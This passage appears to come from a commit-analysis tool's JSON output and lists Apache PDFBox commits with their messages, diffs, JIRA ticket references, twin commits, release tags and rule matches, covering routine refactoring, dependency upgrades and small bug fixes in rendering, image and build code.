GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setComposite(comp);", - "- alphaGraphics.setComposite(comp);", - "+ groupG2D.setComposite(comp);", - "+ alphaG2D.setComposite(comp);", - " }", - "@@ -519,4 +519,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setPaint(paint);", - "- alphaGraphics.setPaint(paint);", - "+ groupG2D.setPaint(paint);", - "+ alphaG2D.setPaint(paint);", - " }", - "@@ -526,4 +526,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setRenderingHint(hintKey, hintValue);", - "- alphaGraphics.setRenderingHint(hintKey, hintValue);", - "+ groupG2D.setRenderingHint(hintKey, hintValue);", - "+ alphaG2D.setRenderingHint(hintKey, hintValue);", - " }", - "@@ -533,4 +533,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setRenderingHints(hints);", - "- alphaGraphics.setRenderingHints(hints);", - "+ groupG2D.setRenderingHints(hints);", - "+ alphaG2D.setRenderingHints(hints);", - " }", - "@@ -540,4 +540,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setStroke(s);", - "- alphaGraphics.setStroke(s);", - "+ groupG2D.setStroke(s);", - "+ alphaG2D.setStroke(s);", - " }", - "@@ -547,4 +547,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setTransform(tx);", - "- alphaGraphics.setTransform(tx);", - "+ groupG2D.setTransform(tx);", - "+ alphaG2D.setTransform(tx);", - " }", - "@@ -554,4 +554,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.shear(shx, shy);", - "- alphaGraphics.shear(shx, shy);", - "+ groupG2D.shear(shx, shy);", - "+ alphaG2D.shear(shx, shy);", - " }", - "@@ -561,4 +561,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.transform(tx);", - "- alphaGraphics.transform(tx);", - "+ groupG2D.transform(tx);", - "+ alphaG2D.transform(tx);", - " }", - "@@ -568,4 +568,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.translate(tx, ty);", - "- alphaGraphics.translate(tx, ty);", - "+ groupG2D.translate(tx, ty);", - "+ alphaG2D.translate(tx, ty);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3000": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "626b0cc71a70f865abfc47c38610dd0f78e5a6cb" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3000", - "relevance": 2 - } - ] - }, - { - "commit_id": "4731163226d8ddeccef9f19fdb297b68eb820f66", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526656290, - "hunks": 1, - "message": "PDFBOX-4224: update jbig2 plugin git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1831862 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 8ac30fd28..c1269ac44 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -99,3 +99,3 @@", - " jbig2-imageio", - "- 3.0.0", - "+ 3.0.1", - " test" - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4224": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "988ff3612de14c204b758f4ddf7f6c1da626b922" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4224", - "relevance": 2 - } - ] - }, - { - "commit_id": "7a304fee6a8c5da93dfa7ceffebe79fd00dc53e6", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527791092, - "hunks": 1, - "message": "PDFBOX-4235: IllegalArgumentException instead of IllegalStateException git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832637 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "index f2973e802..07aa8a326 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "@@ -415,3 +415,3 @@ class AppearanceGeneratorHelper", - " {", - "- throw new IllegalStateException(\"font is null, check whether /DA entry is incomplete or incorrect\");", - "+ throw new IllegalArgumentException(\"font is null, check whether /DA entry is incomplete or incorrect\");", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4235": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "9eff016f57f7782f91f63d35ea11aee33303b3ba" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4235", - "relevance": 2 - } - ] - }, - { - "commit_id": "dc8430f73db794ee6528ea4551911c83154cc6f0", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524301933, - "hunks": 0, - "message": "PDFBOX-4189: add lohit-bengali font for upcoming tests and example git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829698 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/resources/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf", - "new file mode 100644", - "index 000000000..fa0f51627", - "Binary files /dev/null and b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf differ" - ], - "changed_files": [ - "examples/src/main/resources/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "632222236b420218a89d8442719a57fb84224e35" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "92986822c54f759dd990deb27cc8933c1e363d4d", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524466427, - "hunks": 1, - "message": "PDFBOX-4195: force early class loading to check if people forgot to use --add-modules javax.xml.bind git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829822 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java b/preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java", - "index 237fac50f..457ac26bb 100644", - "--- a/preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java", - "+++ b/preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java", - "@@ -158,2 +158,5 @@ public class PreflightDocument extends PDDocument", - " {", - "+ // force early class loading to check if people forgot to use --add-modules javax.xml.bind", - "+ // on java 9 or later", - "+ javax.xml.bind.DatatypeConverter.parseInt(\"0\");", - " context.setConfig(config);" - ], - "changed_files": [ - "preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4195": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "1e292ec2c98edfa9048356174963256bb555b126" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4195", - "relevance": 2 - } - ] - }, - { - "commit_id": "c6e95c0a6ab830e604740607e23916dfb6417943", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523388482, - "hunks": 16, - "message": "PDFBOX-4187: split large method git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828853 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index 06f1e7582..7450953a8 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -55,5 +55,16 @@ public final class LosslessFactory", - " {", - "- int bpc;", - "- PDDeviceColorSpace deviceColorSpace;", - "+ if ((image.getType() == BufferedImage.TYPE_BYTE_GRAY && image.getColorModel().getPixelSize() <= 8)", - "+ || (image.getType() == BufferedImage.TYPE_BYTE_BINARY && image.getColorModel().getPixelSize() == 1))", - "+ {", - "+ return createFromGrayImage(image, document);", - "+ }", - "+ else", - "+ {", - "+ return createFromRGBImage(image, document);", - "+ } ", - "+ }", - "+ private static PDImageXObject createFromGrayImage(BufferedImage image, PDDocument document)", - "+ throws IOException", - "+ {", - " int height = image.getHeight();", - "@@ -61,28 +72,43 @@ public final class LosslessFactory", - " int[] rgbLineBuffer = new int[width];", - "-", - "- if ((image.getType() == BufferedImage.TYPE_BYTE_GRAY && image.getColorModel().getPixelSize() <= 8)", - "- || (image.getType() == BufferedImage.TYPE_BYTE_BINARY && image.getColorModel().getPixelSize() == 1))", - "+ int bpc;", - "+ // grayscale images need one color per sample", - "+ bpc = image.getColorModel().getPixelSize();", - "+ ByteArrayOutputStream baos = new ByteArrayOutputStream(((width*bpc/8)+(width*bpc%8 != 0 ? 1:0))*height);", - "+ MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(baos);", - "+ for (int y = 0; y < height; ++y)", - " {", - "- // grayscale images need one color per sample", - "- bpc = image.getColorModel().getPixelSize();", - "- ByteArrayOutputStream baos = new ByteArrayOutputStream(((width*bpc/8)+(width*bpc%8 != 0 ? 1:0))*height);", - "- MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(baos);", - "- for (int y = 0; y < height; ++y)", - "+ for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", - " {", - "- for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", - "- {", - "- mcios.writeBits(pixel & 0xFF, bpc);", - "- }", - "-", - "- int bitOffset = mcios.getBitOffset();", - "- if (bitOffset != 0)", - "- {", - "- mcios.writeBits(0, 8 - bitOffset);", - "- }", - "+ mcios.writeBits(pixel & 0xFF, bpc);", - " }", - "- mcios.flush();", - "- mcios.close();", - "- return prepareImageXObject(document, baos.toByteArray(), ", - "+ int bitOffset = mcios.getBitOffset();", - "+ if (bitOffset != 0)", - "+ {", - "+ mcios.writeBits(0, 8 - bitOffset);", - "+ }", - "+ }", - "+ mcios.flush();", - "+ mcios.close();", - "+ return prepareImageXObject(document, baos.toByteArray(),", - " image.getWidth(), image.getHeight(), bpc, PDDeviceGray.INSTANCE);", - "+ }", - "+", - "+ private static PDImageXObject createFromRGBImage(BufferedImage image, PDDocument document) throws IOException", - "+ {", - "+ int height = image.getHeight();", - "+ int width = image.getWidth();", - "+ int[] rgbLineBuffer = new int[width];", - "+ int bpc = 8;", - "+ PDDeviceColorSpace deviceColorSpace = PDDeviceRGB.INSTANCE;", - "+ byte[] imageData = new byte[width * height * 3];", - "+ int byteIdx = 0;", - "+ int alphaByteIdx = 0;", - "+ int alphaBitPos = 7;", - "+ int transparency = image.getTransparency();", - "+ int apbc = transparency == Transparency.BITMASK ? 1 : 8;", - "+ byte[] alphaImageData;", - "+ if (transparency != Transparency.OPAQUE)", - "+ {", - "+ alphaImageData = new byte[((width * apbc / 8) + (width * apbc % 8 != 0 ? 1 : 0)) * height];", - " }", - "@@ -90,56 +116,29 @@ public final class LosslessFactory", - " {", - "- // RGB", - "- bpc = 8;", - "- deviceColorSpace = PDDeviceRGB.INSTANCE;", - "- byte[] imageData = new byte[width * height * 3];", - "- int byteIdx = 0;", - "- int alphaByteIdx = 0;", - "- int alphaBitPos = 7;", - "- int transparency = image.getTransparency();", - "- int apbc = transparency == Transparency.BITMASK ? 1 : 8;", - "- byte[] alphaImageData;", - "- if (transparency != Transparency.OPAQUE)", - "- {", - "- alphaImageData = new byte[((width * apbc / 8) + (width * apbc % 8 != 0 ? 1 : 0)) * height];", - "- }", - "- else", - "- {", - "- alphaImageData = new byte[0];", - "- }", - "-", - "- for (int y = 0; y < height; ++y)", - "+ alphaImageData = new byte[0];", - "+ }", - "+ for (int y = 0; y < height; ++y)", - "+ {", - "+ for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", - " {", - "- for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", - "+ imageData[byteIdx++] = (byte) ((pixel >> 16) & 0xFF);", - "+ imageData[byteIdx++] = (byte) ((pixel >> 8) & 0xFF);", - "+ imageData[byteIdx++] = (byte) (pixel & 0xFF);", - "+ if (transparency != Transparency.OPAQUE)", - " {", - "- imageData[byteIdx++] = (byte) ((pixel >> 16) & 0xFF);", - "- imageData[byteIdx++] = (byte) ((pixel >> 8) & 0xFF);", - "- imageData[byteIdx++] = (byte) (pixel & 0xFF);", - "- if (transparency != Transparency.OPAQUE)", - "+ // we have the alpha right here, so no need to do it separately", - "+ // as done prior April 2018", - "+ if (transparency == Transparency.BITMASK)", - " {", - "- // we have the alpha right here, so no need to do it separately", - "- // as done prior April 2018", - "- if (transparency == Transparency.BITMASK)", - "+ // write a bit", - "+ alphaImageData[alphaByteIdx] |= ((pixel >> 24) & 1) << alphaBitPos;", - "+ if (--alphaBitPos < 0)", - " {", - "- // write a bit", - "- alphaImageData[alphaByteIdx] |= ((pixel >> 24) & 1) << alphaBitPos;", - "- if (--alphaBitPos < 0)", - "- {", - "- alphaBitPos = 7;", - "- ++alphaByteIdx;", - "- }", - "- }", - "- else", - "- {", - "- // write a byte", - "- alphaImageData[alphaByteIdx++] = (byte) ((pixel >> 24) & 0xFF);", - "+ alphaBitPos = 7;", - "+ ++alphaByteIdx;", - " }", - " }", - "- }", - "- if (transparency == Transparency.BITMASK)", - "- {", - "- // skip boundary if needed", - "- if (alphaBitPos != 7)", - "+ else", - " {", - "- alphaBitPos = 7;", - "- ++alphaByteIdx;", - "+ // write a byte", - "+ alphaImageData[alphaByteIdx++] = (byte) ((pixel >> 24) & 0xFF);", - " }", - "@@ -147,14 +146,21 @@ public final class LosslessFactory", - " }", - "- PDImageXObject pdImage = prepareImageXObject(document, imageData,", - "- image.getWidth(), image.getHeight(), bpc, deviceColorSpace);", - "-", - "- if (transparency != Transparency.OPAQUE)", - "+ if (transparency == Transparency.BITMASK)", - " {", - "- PDImageXObject pdMask = prepareImageXObject(document, alphaImageData,", - "- image.getWidth(), image.getHeight(), apbc, PDDeviceGray.INSTANCE);", - "- pdImage.getCOSObject().setItem(COSName.SMASK, pdMask);", - "+ // skip boundary if needed", - "+ if (alphaBitPos != 7)", - "+ {", - "+ alphaBitPos = 7;", - "+ ++alphaByteIdx;", - "+ }", - " }", - "-", - "- return pdImage;", - "- } ", - "+ }", - "+ PDImageXObject pdImage = prepareImageXObject(document, imageData,", - "+ image.getWidth(), image.getHeight(), bpc, deviceColorSpace); ", - "+ if (transparency != Transparency.OPAQUE)", - "+ {", - "+ PDImageXObject pdMask = prepareImageXObject(document, alphaImageData,", - "+ image.getWidth(), image.getHeight(), apbc, PDDeviceGray.INSTANCE);", - "+ pdImage.getCOSObject().setItem(COSName.SMASK, pdMask);", - "+ }", - "+ return pdImage;", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4187": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "af2c0cab8a6c7552ab78bafcdf2c0592b72d863d" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4187", - "relevance": 2 - } - ] - }, - { - "commit_id": "ec0d0434e02a59e2640a0295c833b81da2f2e05a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524334039, - "hunks": 1, - "message": "PDFBOX-4071: KCMS no longer available in JDK9 + clarify msg git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829734 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java", - "index 298bf1525..88665ee03 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java", - "@@ -137,3 +137,3 @@ public final class PDDeviceRGB extends PDDeviceColorSpace", - "- LOG.info(\"To get higher rendering speed on JDK8 or later,\");", - "+ LOG.info(\"To get higher rendering speed on java 8 oder 9,\");", - " LOG.info(\" use the option -Dsun.java2d.cmm=sun.java2d.cmm.kcms.KcmsServiceProvider\");" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "c2e4537bff72f6ce86beadab23fa84e50f64254e" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "81bc2f5bf72edd0bc059af77c9a3d7215e456833", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532268229, - "hunks": 2, - "message": "PDFBOX-4274: use the maven enforcer plugin, as suggested by Karl Heinz Marbaise git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836441 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 2858e38ae..134f56ba2 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -52,7 +52,3 @@", - " 1.60", - "- ", - "- ", - "- ", - "- \t3.3.1", - "- \t", - "+ ", - "@@ -169,2 +165,19 @@", - " ", - "+ ", - "+ maven-enforcer-plugin", - "+ ", - "+ ", - "+ ", - "+ enforce", - "+ ", - "+ ", - "+ ", - "+ ", - "+ 3.3.9", - "+ ", - "+ ", - "+ ", - "+ ", - "+ ", - "+ ", - " " - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4274": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "e5990a7daadf9988f01595313e9fb5319a04a3d7" - ], - [ - "no-tag", - "97dc6271f0cdc15ac649a677387a73ca28886d00" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4274", - "relevance": 2 - } - ] - }, - { - "commit_id": "e215ef8108023d24a1de8d61ccee07af40ed19a3", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523894086, - "hunks": 2, - "message": "PDFBOX-4071: update to current versions git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829292 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 0f75edc71..8ac30fd28 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -109,3 +109,3 @@", - " jai-imageio-core", - "- 1.3.1", - "+ 1.4.0", - " test", - "@@ -223,3 +223,3 @@", - " \t animal-sniffer-maven-plugin", - "-\t 1.14", - "+\t 1.16", - " \t " - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "9381b16a96c2a254292d4526aed8a652d2fe868c" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "563f4c4870e30e813ed89e9abdd59356d80bef34", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530363166, - "hunks": 1, - "message": "PDFBOX-4071: lessen memory footprint (no array copying) git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834734 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java b/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", - "index 857550cdd..14b18ba97 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", - "@@ -95,3 +95,3 @@ public final class COSOutputStream extends FilterOutputStream", - " // flush the entire stream", - "- out.write(buffer.toByteArray());", - "+ buffer.writeTo(out);", - " super.close();" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "97b5d7d696099d866a5f4a6ae888f0b247d19c88" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "e1fbc360fc9955b88cdb09b7ae329e9bebc6ddeb", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523467843, - "hunks": 4, - "message": "PDFBOX-4187: simplify code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828915 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index 0dde8b54f..cf914f2ad 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -66,2 +66,3 @@ public final class LosslessFactory", - "+ // grayscale images need one color per sample", - " private static PDImageXObject createFromGrayImage(BufferedImage image, PDDocument document)", - "@@ -72,5 +73,3 @@ public final class LosslessFactory", - " int[] rgbLineBuffer = new int[width];", - "- int bpc;", - "- // grayscale images need one color per sample", - "- bpc = image.getColorModel().getPixelSize();", - "+ int bpc = image.getColorModel().getPixelSize();", - " ByteArrayOutputStream baos = new ByteArrayOutputStream(((width*bpc/8)+(width*bpc%8 != 0 ? 1:0))*height);", - "@@ -146,10 +145,8 @@ public final class LosslessFactory", - " }", - "- if (transparency == Transparency.BITMASK)", - "+", - "+ // skip boundary if needed", - "+ if (transparency == Transparency.BITMASK && alphaBitPos != 7)", - " {", - "- // skip boundary if needed", - "- if (alphaBitPos != 7)", - "- {", - "- alphaBitPos = 7;", - "- ++alphaByteIdx;", - "- }", - "+ alphaBitPos = 7;", - "+ ++alphaByteIdx;", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4187": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "6644ddc8a7333011e3e7e6721aa53caebd87356e" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4187", - "relevance": 2 - } - ] - }, - { - "commit_id": "2e885fa63a34a17c0cfef271128417463adea361", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530476887, - "hunks": 11, - "message": "PDFBOX-4184: support predictor compression and 16 bit RGB images, by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834805 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index 70d71fd9e..457d9825b 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -18,3 +18,8 @@ package org.apache.pdfbox.pdmodel.graphics.image;", - " import java.awt.Transparency;", - "+import java.awt.color.ColorSpace;", - "+import java.awt.color.ICC_ColorSpace;", - "+import java.awt.color.ICC_Profile;", - " import java.awt.image.BufferedImage;", - "+import java.awt.image.DataBuffer;", - "+import java.awt.image.Raster;", - " import java.io.ByteArrayInputStream;", - "@@ -22,4 +27,9 @@ import 